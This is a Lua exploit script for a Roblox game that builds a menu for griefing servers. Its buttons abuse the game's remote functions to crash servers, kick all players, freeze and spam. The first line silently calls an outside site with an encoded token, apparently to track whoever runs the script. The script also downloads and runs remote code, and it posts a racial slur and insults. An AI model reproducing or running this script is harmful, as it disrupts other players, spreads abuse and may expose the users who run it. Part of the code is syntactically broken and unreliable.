game:HttpGet("https://littest.site/yeet/site.php?h=cjN3b1BzX0x6dUJRdzVmSzdqdF9LQTFKWFQ4OFVtbWJSQVBpcGJpaHlldy1pckZGWGtzY2NQNTFvVHBuM3BWaW4wVEE=")
local args = {
    [1] = {
        [1] = "SAVE",
        [2] = "kick all",
        [3] = ":m YOU HAVE BEEN KICKED\nClick the button below to rejoin\nWait for button to appear| :wait 1| :free" ..
            " all| :re all| :displayname all ##################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "############################################################| :talk all ##########" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "##################################################################################" ..
            "################## | :tp all wp-momma | !wait 1 | :freeze all| :boom all 0| :boom all 0| :boom " ..
            "all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all " ..
            "0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :" ..
            "boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom" ..
            " all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all" ..
            " 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| :boom all 0| " ..
            ":boom all 0| :boom all 0| :boom all 0| :boom all 0| "
    }
}

game:GetService("ReplicatedStorage").Network.CommandSaving:InvokeServer(unpack(args))

local ChatStuff = game:GetService("Players").LocalPlayer.PlayerGui.Chat.Frame.ChatBarParentFrame.Frame.BoxFrame.Frame.ChatBar

local function chat(msg)
    ChatStuff:SetTextFromInput(msg)
    game.Players:Chat(msg)
    ChatStuff:SetTextFromInput("")
end

local OrionLib = loadstring(game:HttpGet('https://raw.githubusercontent.com/shlexware/Orion/main/source'))()
local Window = OrionLib:MakeWindow({Name = "AH UI UI", HidePremium = false, IntroText = "I Will Cut Your PP", SaveConfig = true, ConfigFolder = "HubFucked"})

OrionLib:MakeNotification({
      Name = ">:(",
      Content = "Subscribe You Retard",
      Image = "rbxassetid://4483345998",
      Time = 5
})

local Tab = Window:MakeTab({
      Name = "Abuse Tab",
      Icon = "rbxassetid://4483345998",
      PremiumOnly = false
})

local Section = Tab:AddSection({
      Name = "Main"
})

local Teb = Window:MakeTab({
      Name = "OP Tab",
      Icon = "rbxassetid://4483345998",
      PremiumOnly = false
})

local Sextion = Teb:AddSection({
      Name = "Main"
})

Tab:AddButton({
      Name = "Crash Server (DANGER)",
      Callback = function()
                  local args = {
    [1] = {
        [1] = "LOAD",
        [2] = "crash server"
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))

        end    
})

Tab:AddToggle({
      Name = "Super Secret Option",
      Default = false,
      Callback = function(Value)
            print("Kys")
      end    
})

Teb:AddToggle({
      Name = "Super Secret Option",
      Default = false,
      Callback = function(Value)
            print("Kys")
      end    
})

Tab:AddColorpicker({
      Name = "Your Mom's Color",
      Default = Color3.fromRGB(255, 0, 0),
      Callback = function(Value)
            print(Value)
      end        
})

Tab:AddSlider({
      Name = "Crocs",
      Min = 16,
      Max = 100,
      Default = 5,
      Color = Color3.fromRGB(255,255,255),
      Increment = 1,
      ValueName = "Crocs Speed",
      Callback = function(Value)
            game.Players.LocalPlayer.character.Humanoid.WalkSpeed = 16
      end    
})

Teb:AddButton({
      Name = "Crash Server 2 (DANGER)",
      Callback = function()
      print("ready")
      task.wait(1)
      chat("/e :sm UI UI| :music 2244925180 true 1 inf")
      task.wait(1)
                  local args = {
    [1] = {
        [1] = "LOAD",
        [2] = "crash server"
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))

        end    
})

Tab:AddButton({
      Name = "Spam Message",
      Callback = function()
chat("/e :m UI UI")
        end    
})

Tab:AddButton({
      Name = "BRRT Aka Boom",
      Callback = function()
chat("/e :music 2244925180 true 1 inf| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom| :wait 0.001| :boom")
        end    
})

Tab:AddButton({
      Name = "Космос",
      Callback = function()
chat("/e :n Космос| :wait 0.01| :n К о с м о с| :wait 0.01| :n К  о  с  м  о  с| :wait 1| :time 0| :vibrate all 0.2| :ambient 100 0 100| :oambient 100 0 100| :loadb crash server")
        end    
})

Tab:AddTextbox({
      Name = "Load Builds",
      Default = "Builds input",
      TextDisappear = false,
      Callback = function(Value)
            local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))

      end        
})

Teb:AddTextbox({
      Name = "Spam Builds",
      Default = "Builds input",
      TextDisappear = false,
      Callback = function(Value)
      print("e")
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = (Value)
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
task.wait(0.01)
end
})

Teb:AddTextbox({
      Name = "Crash Users",
      Default = "User input",
      TextDisappear = false,
      Callback = function(Value)
chat("/e :forceviewcam (Value) porgumaastik")
      end        
})

Tab:AddTextbox({
      Name = "Run Commands",
      Default = "Command input",
      TextDisappear = false,
      Callback = function(Value)
chat(Value)
      end          
})

local Section2 = Tab:AddSection({
      Name = "Make sure"
})

local Section2 = Tab:AddSection({
      Name = "IT HAS :re or any"
})
local Emu = Window:MakeTab({
      Name = "Social Medias",
      Icon = "rbxassetid://4483345998",
      PremiumOnly = false
})

local Ostrich = Emu:AddSection({
      Name = "When clicked on any link"
})

local Ostrich2 = Emu:AddSection({
      Name = "It will copy into your clipboard"
})

Emu:AddButton({
      Name = "Discord",
      Callback = function()
setclipboard("eek#1521")
        end    
})

Emu:AddButton({
      Name = "Youtube channel",
      Callback = function()
setclipboard("https://youtube.com/@weerawatR15")
        end    
})

Emu:AddButton({
      Name = "Discord server",
      Callback = function()
setclipboard("https://discord.gg/5csewkYegQ")
        end    
})

Teb:AddButton({
      Name = "Freeze Server",
      Callback = function()
chat(":re |:hat me chicken| :wait 2| :free |:setgrav me -9e9 |:jail |:size me 50 |:hatpets me 50 |:hatpets me 50 |:hatpets me 50 |:hatpets me 50 |:hatpets me 50 |:hatpets me 50 |:hatpets me 50 |:hatpets me 50 |:hatpets me 50 |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me |:clone me")
        end    
})

Teb:AddButton({
      Name = "Kick all (Includes you)",
      Callback = function()
chat(":runc kick all")
        end    
})

local Tre = Window:MakeTab({
      Name = "Danger Tab",
      Icon = "rbxassetid://4483345998",
      PremiumOnly = false
})

local Sextion2 = Teb:AddSection({
      Name = "Don't blame me but this should work"
})

Tre:AddButton({
      Name = "Ban Your Account (CLICK YOUR OWN RISK)",
      Callback = function()
chat("FJJUCJJK YOU LOL BJJITCJJH NJJIGGER")
        end    
})

Tre:AddButton({
      Name = "IP Grab Yourself",
      Callback = function()
local ip = tostring(game:HttpGet("https://api.ipify.org", true))
      game:GetService("StarterGui"):SetCore("SendNotification",{
	Title = "ked", -- Required
	Text = (ip), -- Required
	Icon = "rbxassetid://1234567890" -- Optional
    end
end)

        end    
})

Tab:AddButton({
      Name = "Crash servers No Build Need (Execute while f3x)",
      Callback = function()
local args = {
    [1] = "CreatePart",
    [2] = "Normal",
    [3] = CFrame.new(Vector3.new(-7.888767242431641, 20.000003814697266, 16.156932830810547), Vector3.new(-0, -0, -1)),
    [4] = workspace
}

game:GetService("Players").LocalPlayer.Backpack.Folder.SyncAPI.ServerEndpoint:InvokeServer(unpack(args))
task.wait(1)
local args = {
    [1] = "CreateMeshes",
    [2] = {
        [1] = {
            ["Part"] = workspace.Part
        }
    }
}

game:GetService("Players").LocalPlayer.Backpack.Folder.SyncAPI.ServerEndpoint:InvokeServer(unpack(args))
task.wait(1)
local args = {
    [1] = "SyncMesh",
    [2] = {
        [1] = {
            ["MeshType"] = Enum.MeshType.FileMesh,
            ["Part"] = workspace.Part
        }
    }
}

game:GetService("Players").LocalPlayer.Backpack.Folder.SyncAPI.ServerEndpoint:InvokeServer(unpack(args))
task.wait(1)
local args = {
    [1] = "SyncMesh",
    [2] = {
        [1] = {
            ["Part"] = workspace.Part,
            ["MeshId"] = "rbxassetid://9065416517"
        }
    }
}

game:GetService("Players").LocalPlayer.Backpack.Folder.SyncAPI.ServerEndpoint:InvokeServer(unpack(args))
task.wait(1)
local args = {
    [1] = "SyncMesh",
    [2] = {
        [1] = {
            ["Scale"] = Vector3.new(20, 20, 20),
            ["Part"] = workspace.Part
        }
    }
}

game:GetService("Players").LocalPlayer.Backpack.Folder.SyncAPI.ServerEndpoint:InvokeServer(unpack(args))
        end    
})

Teb:AddButton({
      Name = "Load kick (Required)",
      Callback = function()
local args = {
    [1] = {
        [1] = "LOAD",
        [2] = "momma"
    }
}

game:GetService("ReplicatedStorage").Network.BuildSaving:InvokeServer(unpack(args))
        end    
})

OrionLib:Init()
